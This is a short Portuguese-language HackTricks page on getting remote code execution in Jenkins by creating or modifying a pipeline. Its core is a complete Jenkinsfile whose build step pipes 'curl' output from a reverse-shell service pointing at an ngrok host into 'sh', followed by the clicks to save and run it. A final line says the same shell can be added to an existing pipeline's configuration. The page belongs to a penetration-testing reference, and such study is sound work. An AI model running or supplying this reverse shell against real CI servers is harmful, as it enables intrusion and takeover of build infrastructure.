Jenkins RCE Creating/Modifying Pipeline

Support HackTricks

Criando um novo Pipeline

Em "New Item" (acessível em /view/all/newJob) selecione Pipeline:

Na seção Pipeline escreva o reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente, clique em Save e Build Now e o pipeline será executado:

Modificando um Pipeline

Se você puder acessar o arquivo de configuração de algum pipeline configurado, você pode simplesmente modificá-lo adicionando seu reverse shell e então executá-lo ou esperar até que ele seja executado.

Support HackTricks

Last updated